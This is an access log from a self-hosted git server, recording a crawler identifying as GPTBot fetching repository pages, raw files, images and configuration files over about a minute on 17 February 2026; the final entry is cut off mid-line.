"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" -[17/Feb/2026:14:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" -[17/Feb/2026:14:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 20828] [Gzip 12.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:14:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 10961] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" -[17/Feb/2026:14:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" [Client 74.7.227.38] [Length 13517] [Gzip 6.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" -[17/Feb/2026:14:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" [Client 74.7.227.38] [Length 10506] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" -[17/Feb/2026:14:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 25598] [Gzip 11.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" [Client 74.7.227.38] [Length 13573] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" -[17/Feb/2026:14:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" -[17/Feb/2026:14:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" [Client 74.7.227.38] [Length 10534] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" -[17/Feb/2026:14:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" -[17/Feb/2026:14:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10257] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 427] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 26816] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9947] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" -[17/Feb/2026:14:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:14:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 6062] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:14:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" -[17/Feb/2026:14:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" [Client 74.7.227.38] [Length 1058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" -[17/Feb/2026:14:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" [Client 74.7.227.38] [Length 1058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" -[17/Feb/2026:14:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641822] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692372] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" -[17/Feb/2026:14:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10878] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" -[17/Feb/2026:14:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" -[17/Feb/2026:14:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" -[17/Feb/2026:14:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" -[17/Feb/2026:14:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9508] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:14:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 9927] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" -[17/Feb/2026:14:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 11628] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:14:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm" -[17/Feb/2026:14:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=html%2fassets" [Client 74.7.227.38] [Length 19250] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:14:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508485] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699414] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429965] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498858] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 10931] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" -[17/Feb/2026:14:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" -[17/Feb/2026:14:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" [Client 74.7.227.38] [Length 9928] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" -[17/Feb/2026:14:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" -[17/Feb/2026:14:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts?display=source" [Client 74.7.227.38] [Length 11505] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" -[17/Feb/2026:14:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" -[17/Feb/2026:14:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11476] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" -[17/Feb/2026:14:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" -[17/Feb/2026:14:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?display=rendered" [Client 74.7.227.38] [Length 10847] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" -[17/Feb/2026:14:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png?display=rendered" [Client 74.7.227.38] [Length 10837] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png" -[17/Feb/2026:14:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets" [Client 